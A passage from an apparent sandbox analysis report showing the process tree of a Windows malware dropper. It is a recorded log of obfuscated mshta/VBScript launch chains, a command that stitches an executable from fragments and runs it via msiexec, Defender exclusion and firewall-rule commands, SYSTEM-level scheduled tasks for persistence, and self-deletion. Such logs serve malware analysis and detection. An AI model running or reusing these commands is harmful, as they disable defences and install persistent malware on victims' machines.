        "C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\Pictures\Adobe Films\N3yUcmwBWiSPHmjJ7NrmpgSk.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""=="" for %M in ("C:\Users\Admin\Pictures\Adobe Films\N3yUcmwBWiSPHmjJ7NrmpgSk.exe" ) do taskkill -f -iM "%~NxM"
        9⤵
        
        PID:6000
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill -f -iM "N3yUcmwBWiSPHmjJ7NrmpgSk.exe"
        10⤵
        Kills process with taskkill
        
        PID:5292
        
        C:\Users\Admin\Pictures\Adobe Films\xxHhhYfaoWflIwGHzrIuIlVN.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\xxHhhYfaoWflIwGHzrIuIlVN.exe"
        7⤵
        
        PID:6272
        
        C:\Users\Admin\Pictures\Adobe Films\aWdEs42M85XH0e3w5PaHeXQO.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\aWdEs42M85XH0e3w5PaHeXQO.exe"
        7⤵
        
        PID:6276
        
        C:\Users\Admin\AppData\Roaming\Calculator\setup.exe
        
        C:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=1
        8⤵
        
        PID:3544
        
        C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
        
        "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--cSExK3QD"
        9⤵
        
        PID:4944
        
        C:\Users\Admin\Pictures\Adobe Films\dniwRkVetV5YPuNjTIWBXuay.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\dniwRkVetV5YPuNjTIWBXuay.exe"
        7⤵
        
        PID:6488
        
        C:\Users\Admin\Pictures\Adobe Films\EUfHVOu1UxTygYnvusG3g6a4.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\EUfHVOu1UxTygYnvusG3g6a4.exe"
        7⤵
        
        PID:6836
        
        C:\Users\Admin\AppData\Local\Temp\is-I5KNQ.tmp\EUfHVOu1UxTygYnvusG3g6a4.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-I5KNQ.tmp\EUfHVOu1UxTygYnvusG3g6a4.tmp" /SL5="$10532,506127,422400,C:\Users\Admin\Pictures\Adobe Films\EUfHVOu1UxTygYnvusG3g6a4.exe"
        8⤵
        
        PID:4424
        
        C:\Users\Admin\AppData\Local\Temp\is-TC3AT.tmp\DYbALA.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-TC3AT.tmp\DYbALA.exe" /S /UID=2709
        9⤵
        
        PID:6980
        
        C:\Users\Admin\AppData\Local\Temp\80-be5c4-4df-916ae-af9f283d85cad\Velaefetylo.exe
        
        "C:\Users\Admin\AppData\Local\Temp\80-be5c4-4df-916ae-af9f283d85cad\Velaefetylo.exe"
        10⤵
        
        PID:6808
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\xhqwuecn.wni\GcleanerEU.exe /eufive & exit
        11⤵
        
        PID:4620
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\qunyaxcs.pq5\installer.exe /qn CAMPAIGN="654" & exit
        11⤵
        
        PID:7264
        
        C:\Users\Admin\AppData\Local\Temp\qunyaxcs.pq5\installer.exe
        
        C:\Users\Admin\AppData\Local\Temp\qunyaxcs.pq5\installer.exe /qn CAMPAIGN="654"
        12⤵
        
        PID:7892
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\3ybwxf2h.xi4\any.exe & exit
        11⤵
        
        PID:7904
        
        C:\Users\Admin\AppData\Local\Temp\3ybwxf2h.xi4\any.exe
        
        C:\Users\Admin\AppData\Local\Temp\3ybwxf2h.xi4\any.exe
        12⤵
        
        PID:8084
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\lqfi1pul.vhd\gcleaner.exe /mixfive & exit
        11⤵
        
        PID:7416
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\tgxntxyv.nn4\autosubplayer.exe /S & exit
        11⤵
        
        PID:7600
        
        C:\Users\Admin\AppData\Local\Temp\tgxntxyv.nn4\autosubplayer.exe
        
        C:\Users\Admin\AppData\Local\Temp\tgxntxyv.nn4\autosubplayer.exe /S
        12⤵
        
        PID:7960
        
        C:\Users\Admin\Pictures\Adobe Films\h_97bL8EGmkKfzjWJMGu6Ooa.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\h_97bL8EGmkKfzjWJMGu6Ooa.exe"
        7⤵
        
        PID:6804
        
        C:\Users\Admin\Pictures\Adobe Films\h_97bL8EGmkKfzjWJMGu6Ooa.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\h_97bL8EGmkKfzjWJMGu6Ooa.exe" -u
        8⤵
        
        PID:6636
    - - C:\Users\Admin\Pictures\Adobe Films\IygfyCLq515EIwqLhaUxGaK7.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\IygfyCLq515EIwqLhaUxGaK7.exe"
        5⤵
        
        PID:2132
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Sun21e06791ee23a2835.exe
    3⤵
    PID:3912
  - - C:\Users\Admin\AppData\Local\Temp\7zSC65373A6\Sun21e06791ee23a2835.exe
      Sun21e06791ee23a2835.exe
      4⤵
      Executes dropped EXE
      Checks SCSI registry key(s)
      Suspicious behavior: EnumeratesProcesses
      PID:1912
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Sun2128fb23843662d1.exe
    3⤵
    PID:1976
  - - C:\Users\Admin\AppData\Local\Temp\7zSC65373A6\Sun2128fb23843662d1.exe
      Sun2128fb23843662d1.exe
      4⤵
      PID:3256
    - - C:\Users\Admin\AppData\Local\Temp\7zSC65373A6\Sun2128fb23843662d1.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zSC65373A6\Sun2128fb23843662d1.exe
        5⤵
        Executes dropped EXE
        
        PID:4328
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Sun21aaeaf2b3.exe
    3⤵
    PID:1864
  - - C:\Users\Admin\AppData\Local\Temp\7zSC65373A6\Sun21aaeaf2b3.exe
      Sun21aaeaf2b3.exe
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      PID:2328
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 3628 -s 520
    3⤵
    - Program crash
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1688
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Sun21be7f43b93f9f.exe
    3⤵
    PID:1452
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Sun212ea10827dd957ed.exe
    3⤵
    PID:976
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Sun211ab21beada98.exe
    3⤵
    PID:8
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Sun213c49cc3bd4.exe
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2808
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Sun215c5b20adc.exe
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1516
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Sun212736ec63.exe
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2472

C:\Users\Admin\AppData\Local\Temp\7zSC65373A6\Sun212736ec63.exe
Sun212736ec63.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2312

C:\Users\Admin\AppData\Local\Temp\7zSC65373A6\Sun215c5b20adc.exe
Sun215c5b20adc.exe
1⤵
- Executes dropped EXE
PID:3996
- C:\Users\Admin\Pictures\Adobe Films\u8IP3sq9C9GNpXXkiHVLZctr.exe
  "C:\Users\Admin\Pictures\Adobe Films\u8IP3sq9C9GNpXXkiHVLZctr.exe"
  2⤵
  PID:4180
- C:\Users\Admin\Pictures\Adobe Films\_BkNR_uqAvLte4zEDFTZkyvi.exe
  "C:\Users\Admin\Pictures\Adobe Films\_BkNR_uqAvLte4zEDFTZkyvi.exe"
  2⤵
  PID:4520
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
    3⤵
    - Creates scheduled task(s)
    PID:6080
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
    3⤵
    - Creates scheduled task(s)
    PID:4764
- - C:\Users\Admin\Documents\bGICQQpTCLwDrxGrZdpst3ZG.exe
    "C:\Users\Admin\Documents\bGICQQpTCLwDrxGrZdpst3ZG.exe"
    3⤵
    PID:5744
  - - C:\Users\Admin\Pictures\Adobe Films\rXVqfwuy3GPnGm9uFMWfJcA7.exe
      "C:\Users\Admin\Pictures\Adobe Films\rXVqfwuy3GPnGm9uFMWfJcA7.exe"
      4⤵
      PID:6816
  - - C:\Users\Admin\Pictures\Adobe Films\PINZ2EsOIRI7khW30j3gkyDr.exe
      "C:\Users\Admin\Pictures\Adobe Films\PINZ2EsOIRI7khW30j3gkyDr.exe"
      4⤵
      PID:6568
    - - C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\Pictures\Adobe Films\PINZ2EsOIRI7khW30j3gkyDr.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If """" == """" for %M in (""C:\Users\Admin\Pictures\Adobe Films\PINZ2EsOIRI7khW30j3gkyDr.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )
        5⤵
        
        PID:6204
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\Pictures\Adobe Films\PINZ2EsOIRI7khW30j3gkyDr.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""=="" for %M in ("C:\Users\Admin\Pictures\Adobe Films\PINZ2EsOIRI7khW30j3gkyDr.exe" ) do taskkill -f -iM "%~NxM"
        6⤵
        
        PID:840
        
        C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe
        
        ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi
        7⤵
        
        PID:5476
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""/PLQtzfgO0m8dRv4iYALOqi "" == """" for %M in (""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )
        8⤵
        
        PID:1980
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If "/PLQtzfgO0m8dRv4iYALOqi "=="" for %M in ("C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ) do taskkill -f -iM "%~NxM"
        9⤵
        
        PID:5480
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" VbScRIpt:CLosE ( cReAteobjEcT("wscRiPt.SheLl" ). RUn ("C:\Windows\system32\cmd.exe /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~>TRMBiI66.CU & EcHo | Set /P = ""MZ"" > hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu +WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC " , 0, tRUE) )
        8⤵
        
        PID:6668
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~>TRMBiI66.CU & EcHo | Set /P = "MZ" >hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V +1W8lBDVH.AOu +WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC& Del /q *&starT msiexec -Y ..\lXQ2g.WC
        9⤵
        
        PID:2204
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" EcHo "
        10⤵
        
        PID:3860
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" Set /P = "MZ" 1>hKS2IU.1Q"
        10⤵
        
        PID:6972
        
        C:\Windows\SysWOW64\msiexec.exe
        
        msiexec -Y ..\lXQ2g.WC
        10⤵
        
        PID:5460
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill -f -iM "PINZ2EsOIRI7khW30j3gkyDr.exe"
        7⤵
        Kills process with taskkill
        
        PID:4852
  - - C:\Users\Admin\Pictures\Adobe Films\cLtHKBkZGm9v8PQ_KbpDvNSD.exe
      "C:\Users\Admin\Pictures\Adobe Films\cLtHKBkZGm9v8PQ_KbpDvNSD.exe"
      4⤵
      PID:6156
  - - C:\Users\Admin\Pictures\Adobe Films\BjAiDt4yk2kC3dKHygJdFQ6n.exe
      "C:\Users\Admin\Pictures\Adobe Films\BjAiDt4yk2kC3dKHygJdFQ6n.exe"
      4⤵
      PID:6320
  - - C:\Users\Admin\Pictures\Adobe Films\ZRPyk8dItl9Klz2xIlyghQLW.exe
      "C:\Users\Admin\Pictures\Adobe Films\ZRPyk8dItl9Klz2xIlyghQLW.exe"
      4⤵
      PID:6204
  - - C:\Users\Admin\Pictures\Adobe Films\Rh4pXHFFClM6IkyP8I_94fLC.exe
      "C:\Users\Admin\Pictures\Adobe Films\Rh4pXHFFClM6IkyP8I_94fLC.exe"
      4⤵
      PID:6516
  - - C:\Users\Admin\Pictures\Adobe Films\uumo7qPNc4uxJbTCkeTcnO6l.exe
      "C:\Users\Admin\Pictures\Adobe Films\uumo7qPNc4uxJbTCkeTcnO6l.exe"
      4⤵
      PID:6828
    - - C:\Users\Admin\AppData\Local\Temp\is-I1CFO.tmp\uumo7qPNc4uxJbTCkeTcnO6l.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-I1CFO.tmp\uumo7qPNc4uxJbTCkeTcnO6l.tmp" /SL5="$10530,506127,422400,C:\Users\Admin\Pictures\Adobe Films\uumo7qPNc4uxJbTCkeTcnO6l.exe"
        5⤵
        
        PID:7028
      - C:\Users\Admin\AppData\Local\Temp\is-HH2VT.tmp\DYbALA.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-HH2VT.tmp\DYbALA.exe" /S /UID=2709
        6⤵
        
        PID:6956
        
        C:\Users\Admin\AppData\Local\Temp\15-710fe-4ad-3ee91-0e7df9b3e1b44\Tashishashaekae.exe
        
        "C:\Users\Admin\AppData\Local\Temp\15-710fe-4ad-3ee91-0e7df9b3e1b44\Tashishashaekae.exe"
        7⤵
        
        PID:6640
        
        C:\Users\Admin\AppData\Local\Temp\ee-5e3c1-31f-34c80-45cc2f0f65cd5\Wygonuvado.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ee-5e3c1-31f-34c80-45cc2f0f65cd5\Wygonuvado.exe"
        7⤵
        
        PID:6172
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\1yyttjm0.bes\GcleanerEU.exe /eufive & exit
        8⤵
        
        PID:5428
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\mw1dqnku.r4d\installer.exe /qn CAMPAIGN="654" & exit
        8⤵
        
        PID:7256
        
        C:\Users\Admin\AppData\Local\Temp\mw1dqnku.r4d\installer.exe
        
        C:\Users\Admin\AppData\Local\Temp\mw1dqnku.r4d\installer.exe /qn CAMPAIGN="654"
        9⤵
        
        PID:7924
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\hhwyltcw.kf1\any.exe & exit
        8⤵
        
        PID:7812
        
        C:\Users\Admin\AppData\Local\Temp\hhwyltcw.kf1\any.exe
        
        C:\Users\Admin\AppData\Local\Temp\hhwyltcw.kf1\any.exe
        9⤵
        
        PID:6188
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\of1uquvd.b50\gcleaner.exe /mixfive & exit
        8⤵
        
        PID:7928
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\f0m04aop.mco\autosubplayer.exe /S & exit
        8⤵
        
        PID:7480
        
        C:\Users\Admin\AppData\Local\Temp\f0m04aop.mco\autosubplayer.exe
        
        C:\Users\Admin\AppData\Local\Temp\f0m04aop.mco\autosubplayer.exe /S
        9⤵
        
        PID:7984
        
        C:\Program Files\Windows Sidebar\FWBTAMOWIZ\foldershare.exe
        
        "C:\Program Files\Windows Sidebar\FWBTAMOWIZ\foldershare.exe" /VERYSILENT
        7⤵
        
        PID:6512
  - - C:\Users\Admin\Pictures\Adobe Films\aXVFblNt693sIOsvNibNdvP2.exe
      "C:\Users\Admin\Pictures\Adobe Films\aXVFblNt693sIOsvNibNdvP2.exe"
      4⤵
      PID:5812
  - - C:\Users\Admin\Pictures\Adobe Films\VuUZGDvQ5YXmSO8B7UF5_ZAZ.exe
      "C:\Users\Admin\Pictures\Adobe Films\VuUZGDvQ5YXmSO8B7UF5_ZAZ.exe"
      4⤵
      PID:6792
  - - C:\Users\Admin\Pictures\Adobe Films\SpliCU3uBzQzSL3HKuIDiPHr.exe
      "C:\Users\Admin\Pictures\Adobe Films\SpliCU3uBzQzSL3HKuIDiPHr.exe"
      4⤵
      PID:6892
    - - C:\Users\Admin\Pictures\Adobe Films\SpliCU3uBzQzSL3HKuIDiPHr.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\SpliCU3uBzQzSL3HKuIDiPHr.exe" -u
        5⤵
        
        PID:6864
- C:\Users\Admin\Pictures\Adobe Films\j2SMYAEFvDJmMyBz_WqWfCHi.exe
  "C:\Users\Admin\Pictures\Adobe Films\j2SMYAEFvDJmMyBz_WqWfCHi.exe"
  2⤵
  PID:2184
- C:\Users\Admin\Pictures\Adobe Films\4UKe4C3T4WnHTwIz3zdFsTCg.exe
  "C:\Users\Admin\Pictures\Adobe Films\4UKe4C3T4WnHTwIz3zdFsTCg.exe"
  2⤵
  PID:364
- - C:\Users\Admin\Pictures\Adobe Films\4UKe4C3T4WnHTwIz3zdFsTCg.exe
    "C:\Users\Admin\Pictures\Adobe Films\4UKe4C3T4WnHTwIz3zdFsTCg.exe"
    3⤵
    PID:6028
- C:\Users\Admin\Pictures\Adobe Films\3Bw5vZlwNJ95HA25kcOZVscz.exe
  "C:\Users\Admin\Pictures\Adobe Films\3Bw5vZlwNJ95HA25kcOZVscz.exe"
  2⤵
  PID:3800
- - C:\Program Files (x86)\Company\NewProduct\cutm3.exe
    "C:\Program Files (x86)\Company\NewProduct\cutm3.exe"
    3⤵
    PID:2064
- C:\Users\Admin\Pictures\Adobe Films\ZbzvMiwu7j8hEnisVJLAtty2.exe
  "C:\Users\Admin\Pictures\Adobe Films\ZbzvMiwu7j8hEnisVJLAtty2.exe"
  2⤵
  PID:4628
- C:\Users\Admin\Pictures\Adobe Films\ZAQpp9dGHMyJGphwLnnl6ly2.exe
  "C:\Users\Admin\Pictures\Adobe Films\ZAQpp9dGHMyJGphwLnnl6ly2.exe"
  2⤵
  PID:4792
- C:\Users\Admin\Pictures\Adobe Films\tnBq0LI3qUF5CnecKFbgSBYu.exe
  "C:\Users\Admin\Pictures\Adobe Films\tnBq0LI3qUF5CnecKFbgSBYu.exe"
  2⤵
  - Executes dropped EXE
  PID:4904
- C:\Users\Admin\Pictures\Adobe Films\JR1_wKqDXlK81TjrWJ37M6qH.exe
  "C:\Users\Admin\Pictures\Adobe Films\JR1_wKqDXlK81TjrWJ37M6qH.exe"
  2⤵
  PID:3608
- C:\Users\Admin\Pictures\Adobe Films\13VdPGReCepVPPaoE8pa1MzZ.exe
  "C:\Users\Admin\Pictures\Adobe Films\13VdPGReCepVPPaoE8pa1MzZ.exe"
  2⤵
  PID:2540
- C:\Users\Admin\Pictures\Adobe Films\GPgyOEAsINX2GybRLpxLD4D6.exe
  "C:\Users\Admin\Pictures\Adobe Films\GPgyOEAsINX2GybRLpxLD4D6.exe"
  2⤵
  PID:4592
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
    3⤵
    PID:3436
- C:\Users\Admin\Pictures\Adobe Films\pOPnP0i4nPkACgtElYB2FFhV.exe
  "C:\Users\Admin\Pictures\Adobe Films\pOPnP0i4nPkACgtElYB2FFhV.exe"
  2⤵
  PID:2356
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\pOPnP0i4nPkACgtElYB2FFhV.exe" & exit
    3⤵
    PID:5064
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 5
      4⤵
      Delays execution with timeout.exe
      PID:6084
- C:\Users\Admin\Pictures\Adobe Films\TM9YUfuMAIop2YmGaM3ZE_uu.exe
  "C:\Users\Admin\Pictures\Adobe Films\TM9YUfuMAIop2YmGaM3ZE_uu.exe"
  2⤵
  PID:3272
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\
    3⤵
    PID:3112
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath \\?\C:\Windows \
    3⤵
    PID:1980
- - C:\Windows\System32\netsh.exe
    "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes
    3⤵
    PID:208
- - C:\Windows\SYSTEM32\schtasks.exe
    schtasks /create /sc minute /ED "11/02/2024" /mo 7 /tn "Timer" /tr c:\windows\system\svchost.exe /ru SYSTEM
    3⤵
    - Blocklisted process makes network request
    - Creates scheduled task(s)
    PID:1376
- - C:\Windows\System32\netsh.exe
    "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes
    3⤵
    PID:4112
- - C:\Windows\System\svchost.exe
    "C:\Windows\System\svchost.exe" formal
    3⤵
    PID:5132
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\
      4⤵
      PID:6020
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath \\?\C:\Windows \
      4⤵
      PID:5540
  - - C:\Windows\System32\netsh.exe
      "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes
      4⤵
      PID:5240
  - - C:\Windows\System32\netsh.exe
      "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes
      4⤵
      PID:6108
- C:\Users\Admin\Pictures\Adobe Films\mYktoA8OYvZFi5B5VBhSKYs1.exe
  "C:\Users\Admin\Pictures\Adobe Films\mYktoA8OYvZFi5B5VBhSKYs1.exe"
  2⤵
  PID:4780
- C:\Users\Admin\Pictures\Adobe Films\6IV0uw165UUqUr2BkdB8U5WX.exe
  "C:\Users\Admin\Pictures\Adobe Films\6IV0uw165UUqUr2BkdB8U5WX.exe"
  2⤵
  PID:3624
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
    3⤵
    PID:4752
- C:\Users\Admin\Pictures\Adobe Films\NlBjECYGFGU4_Jvogp_KtE7x.exe
  "C:\Users\Admin\Pictures\Adobe Films\NlBjECYGFGU4_Jvogp_KtE7x.exe"
  2⤵
  PID:952
- - C:\Users\Admin\Pictures\Adobe Films\NlBjECYGFGU4_Jvogp_KtE7x.exe
    "C:\Users\Admin\Pictures\Adobe Films\NlBjECYGFGU4_Jvogp_KtE7x.exe"
    3⤵
    PID:2016
- C:\Users\Admin\Pictures\Adobe Films\p7sbSJvLouNhLO4tvGXNNpcl.exe
  "C:\Users\Admin\Pictures\Adobe Films\p7sbSJvLouNhLO4tvGXNNpcl.exe"
  2⤵
  PID:4364
- - C:\Windows\SysWOW64\cmd.exe
    cmd.exe /c taskkill /f /im chrome.exe
    3⤵
    PID:5424
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /f /im chrome.exe
      4⤵
      Kills process with taskkill
      PID:5412
- C:\Users\Admin\Pictures\Adobe Films\Ti_G0tdIuKLQlcqkLR92SNNV.exe
  "C:\Users\Admin\Pictures\Adobe Films\Ti_G0tdIuKLQlcqkLR92SNNV.exe"
  2⤵
  PID:2012
- C:\Users\Admin\Pictures\Adobe Films\_d9YHSQzf0MmIf9ZDKF3zyfW.exe
  "C:\Users\Admin\Pictures\Adobe Films\_d9YHSQzf0MmIf9ZDKF3zyfW.exe"
  2⤵
  PID:1808
- C:\Users\Admin\Pictures\Adobe Films\XYapgTM5FgkB6ijhM1NFgThC.exe
  "C:\Users\Admin\Pictures\Adobe Films\XYapgTM5FgkB6ijhM1NFgThC.exe"
  2⤵
  PID:4276
- - C:\Users\Admin\AppData\Roaming\6695585.exe
    "C:\Users\Admin\AppData\Roaming\6695585.exe"
    3⤵
    PID:5588
- - C:\Users\Admin\AppData\Roaming\4538371.exe
    "C:\Users\Admin\AppData\Roaming\4538371.exe"
    3⤵
    PID:5784
  - - C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
      "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
      4⤵
      PID:3272
- - C:\Users\Admin\AppData\Roaming\2666328.exe
    "C:\Users\Admin\AppData\Roaming\2666328.exe"
    3⤵
    PID:588
- - C:\Users\Admin\AppData\Roaming\7431658.exe
    "C:\Users\Admin\AppData\Roaming\7431658.exe"
    3⤵
    PID:5920
- - C:\Users\Admin\AppData\Roaming\6030142.exe
    "C:\Users\Admin\AppData\Roaming\6030142.exe"
    3⤵
    PID:5860
- - C:\Users\Admin\AppData\Roaming\5814399.exe
    "C:\Users\Admin\AppData\Roaming\5814399.exe"
    3⤵
    PID:200
  - - C:\Windows\SysWOW64\mshta.exe
      "C:\Windows\System32\mshta.exe" VbscRIpT:cLosE ( cREaTeOBjeCT ("wsCriPT.sHELl"). rUN ("Cmd.exe /q /c Type ""C:\Users\Admin\AppData\Roaming\5814399.exe"" > kSTw_GRvR1eDFi.EXE && StARt kStW_grVR1EDFi.exE /P6l3hjJm2mK1sJpxUmLJ & If """"== """" for %k In ( ""C:\Users\Admin\AppData\Roaming\5814399.exe"" ) do taskkill /F /Im ""%~Nxk"" " ,0 , trUE) )
      4⤵
      PID:5004
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /q /c Type "C:\Users\Admin\AppData\Roaming\5814399.exe"> kSTw_GRvR1eDFi.EXE&&StARt kStW_grVR1EDFi.exE /P6l3hjJm2mK1sJpxUmLJ&If ""== "" for %k In ( "C:\Users\Admin\AppData\Roaming\5814399.exe" ) do taskkill /F /Im "%~Nxk"
        5⤵
        
        PID:3208
      - C:\Users\Admin\AppData\Local\Temp\kSTw_GRvR1eDFi.EXE
        
        kStW_grVR1EDFi.exE /P6l3hjJm2mK1sJpxUmLJ
        6⤵
        
        PID:6064
        
        C:\Windows\SysWOW64\mshta.exe
        
